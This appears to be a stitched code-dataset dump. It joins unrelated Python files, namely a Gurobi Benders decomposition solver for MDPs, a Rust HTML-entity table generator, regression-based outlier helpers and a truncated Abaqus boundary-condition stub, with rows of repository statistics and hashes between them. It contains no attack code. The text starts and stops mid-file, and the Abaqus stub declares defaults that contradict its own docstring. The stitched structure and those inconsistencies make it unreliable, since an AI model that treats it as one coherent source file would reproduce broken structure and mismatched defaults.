                                for s_new in self.state_dict.keys()
                            ]),
                            grb.quicksum([
                                coeff_d[i] * self.var_rho[i]
                                for i in range(len(self.D))
                            ]),
                        ])
                    )
                    continue
            # after checking all states
            if optimal:
                self.final_time = time.time() - self.start_time
                # self.MP.write("model/{}-MPMDP.lp".format(self.name))
                if self.log:
                    logging.info("==============================")
                    logging.info("Final Objective: {}".format(self.MP.ObjVal))
                # stop loop
                break
            else:
                self.MP.update()
                # self.MP.write("model/{}-MPMDP.lp".format(self.name))
                iteration += 1
                continue
        # ------------------------- Output --------------------------
        run_time = time.time() - run_time
        # extract policy: most likely action per state
        policy = {}
        for s in self.state_dict.keys():
            policy[self.state_dict[s]] = self.action_dict[np.argmax([
                self.y_val[s, a]
                for a in self.action_dict.keys()
            ])]
        # gap
        gap = 0 if self.MP.IsMIP == 0 else self.MP.MIPGap
        # print solution to file
        if sol_dir == "None":
            pass
        else:
            file = open(
                "{}/{}-MPMDP.txt".format(sol_dir, self.name), mode="w+"
            )
            file.write("==============================\n")
            file.write(
                "Total algorithm run time: {} seconds;\n".format(run_time)
            )
            file.write(
                "Total model solving time: {} seconds;\n".format(solve_time)
            )
            # optimal value and gap
            file.write("==============================\n")
            file.write("Optimal Value:\n")
            file.write("Total value: {};\n".format(self.MP.ObjVal))
            file.write("Gap: {};\n".format(gap))
            for s in self.state_dict.keys():
                file.write("{}: {}\n".format(self.state_dict[s], value[s]))
            # optimal policy
            file.write("==============================\n")
            file.write("Optimal policy:\n")
            for state in self.state_dict.values():
                file.write("{}: {}\n".format(state, policy[state]))
            file.write("==============================\n")
            file.close()
        return self.MP.ObjVal, gap, run_time, solve_time, policy

    def __modify_MDP_dual_monotone(self, s, theta_val, best_action_ind):
        """
        Refresh the dual subproblem of state `s`, forcing a monotone
        policy: actions below `best_action_ind` get a zero upper bound.

        NOTE(review): unlike __modify_MDP_dual, this variant does not
        price the side constraints (no rho term in the objective) --
        confirm whether the monotone path is meant to ignore them.
        """
        # find variables and modify bound + objective coefficient
        for a in self.action_dict.keys():
            if a < best_action_ind:
                self.subproblems[s].getVarByName("y_{}".format(a)).setAttr(
                    "UB", 0
                )
            else:
                self.subproblems[s].getVarByName("y_{}".format(a)).setAttr(
                    "UB", grb.GRB.INFINITY
                )
            self.subproblems[s].getVarByName("y_{}".format(a)).setAttr(
                "Obj", np.sum([
                    self.reward_mat[s, a],
                    np.sum([
                        self.gamma * self.trans_mat[a][
                            s, s_new
                        ] * theta_val[s_new]
                        for s_new in self.state_dict.keys()
                    ])
                ])
            )
        self.subproblems[s].update()
        return

    def MDP_decomposition_monotone(self, sol_dir='None', write_log=False):
        """
        MDP Benders decomposition with monotone policy.
        `sol_dir`: str, directory to output solution, do not include file name.
        `write_log`: bool, write solving data to log, default False.
        Returns (objective, gap, run_time, solve_time, policy).

        NOTE(review): this path never reads the "rho_{i}" master
        variables, so the side constraints do not enter the cuts --
        confirm this is intended for the monotone variant.
        """
        self.log = write_log
        if self.log:
            logging.basicConfig(
                filename='{}.log'.format(self.name), filemode='w+',
                format='%(levelname)s - %(message)s', level=logging.INFO
            )
        # solving time of all models
        solve_time = 0
        # total time of the algorithm
        run_time = time.time()
        # start iteration
        iteration = 0
        while True:
            # solving first stage
            temp_time = time.time()
            self.MP.optimize()
            solve_time = solve_time + (time.time() - temp_time)
            # log
            if self.log:
                logging.info("=========================")
                logging.info("Iteration: {}".format(iteration))
            # check first stage feasibility
            # (fixed) INFEASIBLE status code, not the GRB.INFINITY value
            if self.MP.status == grb.GRB.INFEASIBLE:
                raise ValueError("First stage infeasible!")
            elif self.MP.status == grb.GRB.OPTIMAL:
                # register first stage variables
                # theta
                theta_val = {
                    s: self.MP.getVarByName(
                        "theta_{}".format(s)
                    ).X
                    for s in self.state_dict.keys()
                }
                # log
                if self.log:
                    logging.info("MP Objective: {}".format(self.MP.ObjVal))
                    logging.info("theta: {}".format(theta_val))
            else:
                raise ValueError(
                    "First stage optimality code {}.".format(self.MP.status)
                )
            # going through each scenario
            value = {}
            optimal = True
            epsilon = 1e-5
            # monotone: each state may not pick an action below the
            # previous state's best
            best_action_ind = 0
            for s in self.state_dict.keys():
                # modify second stage dual
                self.__modify_MDP_dual_monotone(s, theta_val, best_action_ind)
                # solve
                temp_time = time.time()
                self.subproblems[s].optimize()
                solve_time = solve_time + (time.time() - temp_time)
                # check status
                if self.subproblems[s].status == grb.GRB.UNBOUNDED:
                    # feasibility cut?
                    # NOTE(review): see MDP_decomposition on the
                    # status/message crossover.
                    raise ValueError("Second stage {} infeasible!".format(s))
                elif self.subproblems[s].status == grb.GRB.INFEASIBLE:
                    raise ValueError("Second stage {} unbounded!".format(s))
                elif self.subproblems[s].status == grb.GRB.OPTIMAL:
                    # register solution
                    for a in self.action_dict.keys():
                        self.y_val[s, a] = self.subproblems[s].getVarByName(
                            "y_{}".format(a)
                        ).X
                    best_action_ind = np.argmax([
                        self.y_val[s, a] for a in self.action_dict.keys()
                    ])
                    # log
                    if self.log:
                        logging.info("-------------------------")
                        logging.info(
                            " State: {}".format(self.state_dict[s])
                        )
                        logging.info(" Objective: {}".format(
                            self.subproblems[s].ObjVal
                        ))
                # e: expected immediate reward under the new policy
                e = np.dot([
                    self.y_val[s, a]
                    for a in self.action_dict.keys()
                ], [
                    self.reward_mat[s, a]
                    for a in self.action_dict.keys()
                ]
                )
                # coeff: cut coefficient of each theta_{s_new}
                coeff = {}
                for s_new in self.state_dict.keys():
                    coeff[s_new] = (-1) * self.gamma * np.sum([
                        self.y_val[s, a] * self.trans_mat[a][s, s_new]
                        for a in self.action_dict.keys()
                    ])
                # E
                E = np.sum([
                    coeff[s_new] * theta_val[s_new]
                    for s_new in self.state_dict.keys()
                ])
                value[s] = e - E
                # condition
                if self.log:
                    logging.info("Optimality condition:")
                    logging.info(
                        " State {}, theta = {}, value = {}".format(
                            self.state_dict[s],
                            self.var_theta[s].X, value[s]
                        )
                    )
                if any([
                    theta_val[s] >= value[s],
                    np.abs(theta_val[s] - value[s]) <= epsilon
                ]):
                    # optimal, continue
                    continue
                else:
                    optimal = False
                    # add optimality cut
                    self.MP.addLConstr(
                        lhs=grb.quicksum([self.var_theta[s]]),
                        sense=grb.GRB.GREATER_EQUAL,
                        rhs=e - grb.quicksum([
                            coeff[s_new] * self.var_theta[s_new]
                            for s_new in self.state_dict.keys()
                        ])
                    )
                    continue
            # after checking all states
            if optimal:
                self.final_time = time.time() - self.start_time
                # self.MP.write("model/{}-MPMDP.lp".format(self.name))
                if self.log:
                    logging.info("==============================")
                    logging.info("Final Objective: {}".format(self.MP.ObjVal))
                # stop loop
                break
            else:
                self.MP.update()
                # self.MP.write("model/{}-MPMDP.lp".format(self.name))
                iteration += 1
                continue
        # ------------------------- Output --------------------------
        run_time = time.time() - run_time
        # extract policy: most likely action per state
        policy = {}
        for s in self.state_dict.keys():
            policy[self.state_dict[s]] = self.action_dict[np.argmax([
                self.y_val[s, a]
                for a in self.action_dict.keys()
            ])]
        # gap
        gap = 0 if self.MP.IsMIP == 0 else self.MP.MIPGap
        # print solution to file
        if sol_dir == "None":
            pass
        else:
            file = open(
                "{}/{}-MPMDP_mono.txt".format(sol_dir, self.name), mode="w+"
            )
            file.write("==============================\n")
            file.write(
                "Total algorithm run time: {} seconds;\n".format(run_time)
            )
            file.write(
                "Total model solving time: {} seconds;\n".format(solve_time)
            )
            # optimal value and gap
            file.write("==============================\n")
            file.write("Optimal Value:\n")
            file.write("Total value: {};\n".format(self.MP.ObjVal))
            file.write("Gap: {};\n".format(gap))
            for s in self.state_dict.keys():
                file.write("{}: {}\n".format(self.state_dict[s], value[s]))
            # optimal policy
            file.write("==============================\n")
            file.write("Optimal policy:\n")
            for state in self.state_dict.values():
                file.write("{}: {}\n".format(state, policy[state]))
            file.write("==============================\n")
            file.close()
        return self.MP.ObjVal, gap, run_time, solve_time, policy
| 39.757798
| 79
| 0.410052
| 4,146
| 43,336
| 4.160154
| 0.051375
| 0.026786
| 0.04673
| 0.038265
| 0.986143
| 0.985853
| 0.985853
| 0.980346
| 0.976635
| 0.975359
| 0
| 0.002406
| 0.453226
| 43,336
| 1,089
| 80
| 39.794307
| 0.725512
| 0.111062
| 0
| 0.881657
| 0
| 0
| 0.077344
| 0.021985
| 0
| 0
| 0
| 0
| 0
| 1
| 0.014201
| false
| 0.004734
| 0.004734
| 0
| 0.03787
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
62d656c88785129e29ef0e5775a6ea022f20caba
| 3,188
|
py
|
Python
|
tools/mk_entities.py
|
waywardmonkeys/pulldown-cmark
|
07863e9e54cfcb108693ca1ab64967b5ad7bd952
|
[
"MIT"
] | 9
|
2020-10-11T13:38:55.000Z
|
2021-12-28T16:17:48.000Z
|
tools/mk_entities.py
|
waywardmonkeys/pulldown-cmark
|
07863e9e54cfcb108693ca1ab64967b5ad7bd952
|
[
"MIT"
] | 2
|
2020-10-28T21:28:48.000Z
|
2020-10-29T15:53:34.000Z
|
tools/mk_entities.py
|
waywardmonkeys/pulldown-cmark
|
07863e9e54cfcb108693ca1ab64967b5ad7bd952
|
[
"MIT"
] | 7
|
2020-10-26T02:16:34.000Z
|
2022-01-27T19:44:04.000Z
|
# Copyright 2015 Google Inc. All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
# get https://html.spec.whatwg.org/multipage/entities.json
# Usage: python tools/mk_entities.py entities.json > src/entities.rs
import json
import sys
def main(args):
    """Generate ``src/entities.rs`` from the WHATWG ``entities.json`` data.

    Usage: python tools/mk_entities.py entities.json > src/entities.rs

    Writes a Rust source file to stdout containing two parallel sorted
    arrays (entity names and their expansion strings) plus a lookup
    function based on binary search.

    Parameters
    ----------
    args
        ``sys.argv``-style list; ``args[1]`` is the path to entities.json.
    """
    # json.load on an open file replaces the Python-2-only file() builtin
    # that the original script used; the `with` block guarantees the file
    # handle is closed.
    with open(args[1]) as f:
        jsondata = json.load(f)
    # Keep only canonical entities (terminated by ';'), stripping the
    # leading '&' and trailing ';' so "&amp;" becomes "amp".  Sorted order
    # is required by the Rust binary_search in the emitted code.
    entities = sorted(entity[1:-1] for entity in jsondata if entity.endswith(';'))
    print("""// Copyright 2015 Google Inc. All rights reserved.
//
// Permission is hereby granted, free of charge, to any person obtaining a copy
// of this software and associated documentation files (the "Software"), to deal
// in the Software without restriction, including without limitation the rights
// to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
// copies of the Software, and to permit persons to whom the Software is
// furnished to do so, subject to the following conditions:
//
// The above copyright notice and this permission notice shall be included in
// all copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
// IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
// FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
// AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
// LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
// OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
// THE SOFTWARE.
//! Expansions of HTML5 entities
// Autogenerated by mk_entities.py
const ENTITIES: [&'static str; %i] = [""" % len(entities))
    for e in entities:
        print(" \"" + e + "\",")
    print(""" ];
const ENTITY_VALUES: [&'static str; %i] = [""" % len(entities))
    for e in entities:
        codepoints = jsondata['&' + e + ';']["codepoints"]
        # Emit Rust unicode escapes (\u{XXXX}).  The backslash must itself be
        # escaped here: in Python 3, '\u{' is an invalid \u escape sequence.
        s = ''.join(['\\u{%04X}' % cp for cp in codepoints])
        print(" \"" + s + "\",")
    print(""" ];
pub fn get_entity(name: &str) -> Option<&'static str> {
    ENTITIES.binary_search(&name).ok().map(|i| ENTITY_VALUES[i])
}
""")


if __name__ == '__main__':
    main(sys.argv)
| 44.277778
| 83
| 0.717691
| 462
| 3,188
| 4.939394
| 0.331169
| 0.077125
| 0.022787
| 0.019281
| 0.788782
| 0.788782
| 0.788782
| 0.788782
| 0.788782
| 0.758107
| 0
| 0.00538
| 0.183814
| 3,188
| 72
| 84
| 44.277778
| 0.871637
| 0.373902
| 0
| 0.166667
| 0
| 0
| 0.745316
| 0.021266
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.047619
| null | null | 0.119048
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
62f32423ab8980f8f59617263d230752dc436e27
| 1,977
|
py
|
Python
|
otools/estimate_db.py
|
filipp-g/magneto
|
06be4badd37d412be094e917bb44b8ab15ae79b6
|
[
"MIT"
] | null | null | null |
otools/estimate_db.py
|
filipp-g/magneto
|
06be4badd37d412be094e917bb44b8ab15ae79b6
|
[
"MIT"
] | 6
|
2019-10-20T17:11:40.000Z
|
2019-10-20T17:13:13.000Z
|
otools/estimate_db.py
|
filipp-g/magneto
|
06be4badd37d412be094e917bb44b8ab15ae79b6
|
[
"MIT"
] | 1
|
2019-10-19T01:52:20.000Z
|
2019-10-19T01:52:20.000Z
|
import numpy as np
from sklearn.linear_model import LinearRegression
from sklearn.preprocessing import PolynomialFeatures
def estimate_by_station(i, j, raw_station_data):
    """Predict the value of station ``i`` at time index ``j``.

    Fits a degree-3 polynomial regression over the station's time series
    (time index plus a constant column as raw features) and evaluates the
    fitted model at time ``j + 1``.
    """
    series = np.transpose(np.array(raw_station_data[i, :]))
    time_idx = np.array(range(1, len(series) + 1))
    intercept = np.array(np.ones(len(time_idx)))
    design = np.transpose(np.matrix([time_idx, intercept]))
    poly = PolynomialFeatures(degree=3)
    design_poly = poly.fit_transform(design)
    poly.fit(design_poly, series)
    model = LinearRegression()
    model.fit(design_poly, series)
    return model.predict(poly.fit_transform(np.matrix([(j + 1), 1])))
def get_extremes_for_station(i, raw_station_data):
    """Flag outlier time points for station ``i``.

    Fits a degree-3 polynomial regression to the station's time series and
    returns a list with 1 where the residual deviates from the mean residual
    by more than one standard deviation, 0 elsewhere.
    """
    series = np.transpose(np.array(raw_station_data[i, :]))
    time_idx = np.array(range(1, len(series) + 1))
    intercept = np.array(np.ones(len(time_idx)))
    design = np.transpose(np.matrix([time_idx, intercept]))
    poly = PolynomialFeatures(degree=3)
    design_poly = poly.fit_transform(design)
    poly.fit(design_poly, series)
    model = LinearRegression()
    model.fit(design_poly, series)
    fitted = model.predict(poly.fit_transform(design))
    residuals = series - fitted
    res_mean = residuals.mean()
    res_std = residuals.std()
    # 1 = residual more than one std-dev away from the mean residual.
    return [1 if abs(r - res_mean) > res_std else 0 for r in residuals]
def get_extremes_for_time(j, raw_station_data):
    """Flag outlier stations at time index ``j``.

    Fits a degree-3 polynomial regression across stations at the given time
    column and returns a list with 1 where the residual deviates from the
    mean residual by more than one standard deviation, 0 elsewhere.
    """
    column = np.array((raw_station_data[:, j]))
    station_idx = np.array(range(1, len(column) + 1))
    intercept = np.array(np.ones(len(station_idx)))
    design = np.transpose(np.matrix([station_idx, intercept]))
    poly = PolynomialFeatures(degree=3)
    design_poly = poly.fit_transform(design)
    poly.fit(design_poly, column)
    model = LinearRegression()
    model.fit(design_poly, column)
    fitted = model.predict(poly.fit_transform(design))
    residuals = column - fitted
    res_mean = residuals.mean()
    res_std = residuals.std()
    # 1 = residual more than one std-dev away from the mean residual.
    return [1 if abs(r - res_mean) > res_std else 0 for r in residuals]
| 28.242857
| 67
| 0.672231
| 296
| 1,977
| 4.341216
| 0.182432
| 0.049027
| 0.06537
| 0.042023
| 0.838132
| 0.801556
| 0.764981
| 0.764981
| 0.764981
| 0.764981
| 0
| 0.023471
| 0.181082
| 1,977
| 70
| 68
| 28.242857
| 0.770229
| 0
| 0
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.053571
| false
| 0
| 0.053571
| 0
| 0.160714
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
62f7a26b699307810b12916eddc7cce0121ee3ea
| 29,307
|
py
|
Python
|
src/abaqus/BoundaryCondition/EulerianMotionBC.py
|
Haiiliin/PyAbaqus
|
f20db6ebea19b73059fe875a53be370253381078
|
[
"MIT"
] | 7
|
2022-01-21T09:15:45.000Z
|
2022-02-15T09:31:58.000Z
|
src/abaqus/BoundaryCondition/EulerianMotionBC.py
|
Haiiliin/PyAbaqus
|
f20db6ebea19b73059fe875a53be370253381078
|
[
"MIT"
] | null | null | null |
src/abaqus/BoundaryCondition/EulerianMotionBC.py
|
Haiiliin/PyAbaqus
|
f20db6ebea19b73059fe875a53be370253381078
|
[
"MIT"
] | null | null | null |
from abaqusConstants import *
from .BoundaryCondition import BoundaryCondition
from ..Region.Region import Region
class EulerianMotionBC(BoundaryCondition):
    """The EulerianMotionBC object stores the data for an Eulerian mesh motion boundary
    condition.
    The EulerianMotionBC object is derived from the BoundaryCondition object.
    Attributes
    ----------
    name: str
        A String specifying the boundary condition repository key.
    followRegion: Boolean
        A Boolean specifying whether the mesh will follow a regular surface region or an
        Eulerian surface. The default value is ON.
    ctrPosition1: SymbolicConstant
        A SymbolicConstant specifying the 1-direction translational constraint on the center of
        the Eulerian mesh. Possible values are FREE and FIXED. The default value is FREE.
    ctrPosition2: SymbolicConstant
        A SymbolicConstant specifying the 2-direction translational constraint on the center of
        the Eulerian mesh. Possible values are FREE and FIXED. The default value is FREE.
    ctrPosition3: SymbolicConstant
        A SymbolicConstant specifying the 3-direction translational constraint on the center of
        the Eulerian mesh. Possible values are FREE and FIXED. The default value is FREE.
    posPosition1: SymbolicConstant
        A SymbolicConstant specifying the translational constraint on the positive (maximum)
        bounds of the mesh in the 1 direction. Possible values are FREE and FIXED. The default
        value is FREE.
    posPosition2: SymbolicConstant
        A SymbolicConstant specifying the translational constraint on the positive (maximum)
        bounds of the mesh in the 2 direction. Possible values are FREE and FIXED. The default
        value is FREE.
    posPosition3: SymbolicConstant
        A SymbolicConstant specifying the translational constraint on the positive (maximum)
        bounds of the mesh in the 3 direction. Possible values are FREE and FIXED. The default
        value is FREE.
    negPosition1: SymbolicConstant
        A SymbolicConstant specifying the translational constraint on the negative (minimum)
        bounds of the mesh in the 1 direction. Possible values are FREE and FIXED. The default
        value is FREE.
    negPosition2: SymbolicConstant
        A SymbolicConstant specifying the translational constraint on the negative (minimum)
        bounds of the mesh in the 2 direction. Possible values are FREE and FIXED. The default
        value is FREE.
    negPosition3: SymbolicConstant
        A SymbolicConstant specifying the translational constraint on the negative (minimum)
        bounds of the mesh in the 3 direction. Possible values are FREE and FIXED. The default
        value is FREE.
    expansionRatio1: float
        None or a Float specifying the upper bounds on the allowable scaling of the mesh in the
        1 direction. If **expansionRatio1=None**, then there is no upper limit. The default value
        is None.
    expansionRatio2: float
        None or a Float specifying the upper bounds on the allowable scaling of the mesh in the
        2 direction. If **expansionRatio2=None**, then there is no upper limit. The default value
        is None.
    expansionRatio3: float
        None or a Float specifying the upper bounds on the allowable scaling of the mesh in the
        3 direction. If **expansionRatio3=None**, then there is no upper limit. The default value
        is None.
    contractRatio1: float
        A Float specifying the lower bounds on the allowable scaling of the mesh in the 1
        direction. The default value is 0.0.
    contractRatio2: float
        A Float specifying the lower bounds on the allowable scaling of the mesh in the 2
        direction. The default value is 0.0.
    contractRatio3: float
        A Float specifying the lower bounds on the allowable scaling of the mesh in the 3
        direction. The default value is 0.0.
    allowContraction: Boolean
        A Boolean specifying whether the mesh is allowed to contract . The default value is ON.
    aspectLimit: float
        A Float specifying the maximum change in allowed aspect ratio (for any of the three mesh
        aspects, 1-2, 2-3, 3-1). The default value is 10.0.
    vmaxFactor: float
        A Float specifying the multiplier for the mesh nodal velocity limit. The default value
        is 1.01.
    volThreshold: float
        A Float specifying the lower bounds on the volume fraction when determining which nodes
        to include in the surface bounding box calculation for an Eulerian material surface.
        This argument applies only when **followRegion=False**. The default value is 0.5.
    bufferSize: float
        None or a Float specifying the buffer between the surface box and the Eulerian section
        mesh bounding box. The default value is 2.0.
    instanceName: str
        A String specifying the name of the Eulerian part instance.
    materialName: str
        A String specifying the name of the Eulerian surface to follow. This argument applies
        only when **followRegion=False**.
    category: SymbolicConstant
        A SymbolicConstant specifying the category of the boundary condition. Possible values
        are MECHANICAL and THERMAL.
    region: Region
        A :py:class:`~abaqus.Region.Region.Region` object specifying the region to which the boundary condition is applied.
    localCsys: str
        None or a :py:class:`~abaqus.Datum.DatumCsys.DatumCsys` object specifying the local coordinate system of the boundary
        condition's degrees of freedom. If **localCsys=None**, the degrees of freedom are defined
        in the global coordinate system. The default value is None.
    Notes
    -----
    This object can be accessed by:
    .. code-block:: python
        import load
        mdb.models[name].boundaryConditions[name]
    """

    # A String specifying the boundary condition repository key.
    name: str = ''

    # A Boolean specifying whether the mesh will follow a regular surface region or an
    # Eulerian surface. The default value is ON.
    followRegion: Boolean = ON

    # A SymbolicConstant specifying the 1-direction translational constraint on the center of
    # the Eulerian mesh. Possible values are FREE and FIXED. The default value is FREE.
    ctrPosition1: SymbolicConstant = FREE

    # A SymbolicConstant specifying the 2-direction translational constraint on the center of
    # the Eulerian mesh. Possible values are FREE and FIXED. The default value is FREE.
    ctrPosition2: SymbolicConstant = FREE

    # A SymbolicConstant specifying the 3-direction translational constraint on the center of
    # the Eulerian mesh. Possible values are FREE and FIXED. The default value is FREE.
    ctrPosition3: SymbolicConstant = FREE

    # A SymbolicConstant specifying the translational constraint on the positive (maximum)
    # bounds of the mesh in the 1 direction. Possible values are FREE and FIXED. The default
    # value is FREE.
    posPosition1: SymbolicConstant = FREE

    # A SymbolicConstant specifying the translational constraint on the positive (maximum)
    # bounds of the mesh in the 2 direction. Possible values are FREE and FIXED. The default
    # value is FREE.
    posPosition2: SymbolicConstant = FREE

    # A SymbolicConstant specifying the translational constraint on the positive (maximum)
    # bounds of the mesh in the 3 direction. Possible values are FREE and FIXED. The default
    # value is FREE.
    posPosition3: SymbolicConstant = FREE

    # A SymbolicConstant specifying the translational constraint on the negative (minimum)
    # bounds of the mesh in the 1 direction. Possible values are FREE and FIXED. The default
    # value is FREE.
    negPosition1: SymbolicConstant = FREE

    # A SymbolicConstant specifying the translational constraint on the negative (minimum)
    # bounds of the mesh in the 2 direction. Possible values are FREE and FIXED. The default
    # value is FREE.
    negPosition2: SymbolicConstant = FREE

    # A SymbolicConstant specifying the translational constraint on the negative (minimum)
    # bounds of the mesh in the 3 direction. Possible values are FREE and FIXED. The default
    # value is FREE.
    negPosition3: SymbolicConstant = FREE

    # None or a Float specifying the upper bounds on the allowable scaling of the mesh in the
    # 1 direction. If *expansionRatio1*=None, then there is no upper limit. The default value
    # is None.
    # NOTE(review): annotated `float` but defaults to None — an Optional annotation
    # would be more precise (same for expansionRatio2/3, category and localCsys below).
    expansionRatio1: float = None

    # None or a Float specifying the upper bounds on the allowable scaling of the mesh in the
    # 2 direction. If *expansionRatio2*=None, then there is no upper limit. The default value
    # is None.
    expansionRatio2: float = None

    # None or a Float specifying the upper bounds on the allowable scaling of the mesh in the
    # 3 direction. If *expansionRatio3*=None, then there is no upper limit. The default value
    # is None.
    expansionRatio3: float = None

    # A Float specifying the lower bounds on the allowable scaling of the mesh in the 1
    # direction. The default value is 0.0.
    contractRatio1: float = 0

    # A Float specifying the lower bounds on the allowable scaling of the mesh in the 2
    # direction. The default value is 0.0.
    contractRatio2: float = 0

    # A Float specifying the lower bounds on the allowable scaling of the mesh in the 3
    # direction. The default value is 0.0.
    contractRatio3: float = 0

    # A Boolean specifying whether the mesh is allowed to contract . The default value is ON.
    allowContraction: Boolean = ON

    # A Float specifying the maximum change in allowed aspect ratio (for any of the three mesh
    # aspects, 1-2, 2-3, 3-1). The default value is 10.0.
    aspectLimit: float = 10

    # A Float specifying the multiplier for the mesh nodal velocity limit. The default value
    # is 1.01.
    # NOTE(review): the docstring documents a default of 1.01, but 1 is declared
    # here — confirm against the Abaqus scripting reference.
    vmaxFactor: float = 1

    # A Float specifying the lower bounds on the volume fraction when determining which nodes
    # to include in the surface bounding box calculation for an Eulerian material surface.
    # This argument applies only when *followRegion*=False. The default value is 0.5.
    # NOTE(review): the docstring documents a default of 0.5, but 0 is declared
    # here — confirm against the Abaqus scripting reference.
    volThreshold: float = 0

    # None or a Float specifying the buffer between the surface box and the Eulerian section
    # mesh bounding box. The default value is 2.0.
    bufferSize: float = 2

    # A String specifying the name of the Eulerian part instance.
    instanceName: str = ''

    # A String specifying the name of the Eulerian surface to follow. This argument applies
    # only when *followRegion*=False.
    materialName: str = ''

    # A SymbolicConstant specifying the category of the boundary condition. Possible values
    # are MECHANICAL and THERMAL.
    category: SymbolicConstant = None

    # A Region object specifying the region to which the boundary condition is applied.
    region: Region = Region()

    # None or a DatumCsys object specifying the local coordinate system of the boundary
    # condition's degrees of freedom. If *localCsys*=None, the degrees of freedom are defined
    # in the global coordinate system. The default value is None.
    localCsys: str = None

    def __init__(self, name: str, createStepName: str, instanceName: str, followRegion: Boolean = ON,
                 region: Region = Region(), materialName: str = '',
                 ctrPosition1: SymbolicConstant = FREE, posPosition1: SymbolicConstant = FREE,
                 negPosition1: SymbolicConstant = FREE, expansionRatio1: float = None,
                 contractRatio1: float = 0, ctrPosition2: SymbolicConstant = FREE,
                 posPosition2: SymbolicConstant = FREE, negPosition2: SymbolicConstant = FREE,
                 expansionRatio2: float = None, contractRatio2: float = 0,
                 ctrPosition3: SymbolicConstant = FREE, posPosition3: SymbolicConstant = FREE,
                 negPosition3: SymbolicConstant = FREE, expansionRatio3: float = None,
                 contractRatio3: float = 0, allowContraction: Boolean = ON, aspectLimit: float = 10,
                 vmaxFactor: float = 1, volThreshold: float = 0, bufferSize: float = 2):
        """This method creates an EulerianMotionBC object.
        Notes
        -----
        This function can be accessed by:
        .. code-block:: python
            mdb.models[name].EulerianMotionBC
        Parameters
        ----------
        name
            A String specifying the boundary condition repository key.
        createStepName
            A String specifying the name of the step in which the boundary condition is created.
        instanceName
            A String specifying the name of the Eulerian part instance.
        followRegion
            A Boolean specifying whether the mesh will follow a regular surface region or an
            Eulerian surface. The default value is ON.
        region
            A Region object specifying the region to which the boundary condition is applied.
        materialName
            A String specifying the name of the Eulerian surface to follow. This argument applies
            only when *followRegion*=False.
        ctrPosition1
            A SymbolicConstant specifying the 1-direction translational constraint on the center of
            the Eulerian mesh. Possible values are FREE and FIXED. The default value is FREE.
        posPosition1
            A SymbolicConstant specifying the translational constraint on the positive (maximum)
            bounds of the mesh in the 1 direction. Possible values are FREE and FIXED. The default
            value is FREE.
        negPosition1
            A SymbolicConstant specifying the translational constraint on the negative (minimum)
            bounds of the mesh in the 1 direction. Possible values are FREE and FIXED. The default
            value is FREE.
        expansionRatio1
            None or a Float specifying the upper bounds on the allowable scaling of the mesh in the
            1 direction. If *expansionRatio1*=None, then there is no upper limit. The default value
            is None.
        contractRatio1
            A Float specifying the lower bounds on the allowable scaling of the mesh in the 1
            direction. The default value is 0.0.
        ctrPosition2
            A SymbolicConstant specifying the 2-direction translational constraint on the center of
            the Eulerian mesh. Possible values are FREE and FIXED. The default value is FREE.
        posPosition2
            A SymbolicConstant specifying the translational constraint on the positive (maximum)
            bounds of the mesh in the 2 direction. Possible values are FREE and FIXED. The default
            value is FREE.
        negPosition2
            A SymbolicConstant specifying the translational constraint on the negative (minimum)
            bounds of the mesh in the 2 direction. Possible values are FREE and FIXED. The default
            value is FREE.
        expansionRatio2
            None or a Float specifying the upper bounds on the allowable scaling of the mesh in the
            2 direction. If *expansionRatio2*=None, then there is no upper limit. The default value
            is None.
        contractRatio2
            A Float specifying the lower bounds on the allowable scaling of the mesh in the 2
            direction. The default value is 0.0.
        ctrPosition3
            A SymbolicConstant specifying the 3-direction translational constraint on the center of
            the Eulerian mesh. Possible values are FREE and FIXED. The default value is FREE.
        posPosition3
            A SymbolicConstant specifying the translational constraint on the positive (maximum)
            bounds of the mesh in the 3 direction. Possible values are FREE and FIXED. The default
            value is FREE.
        negPosition3
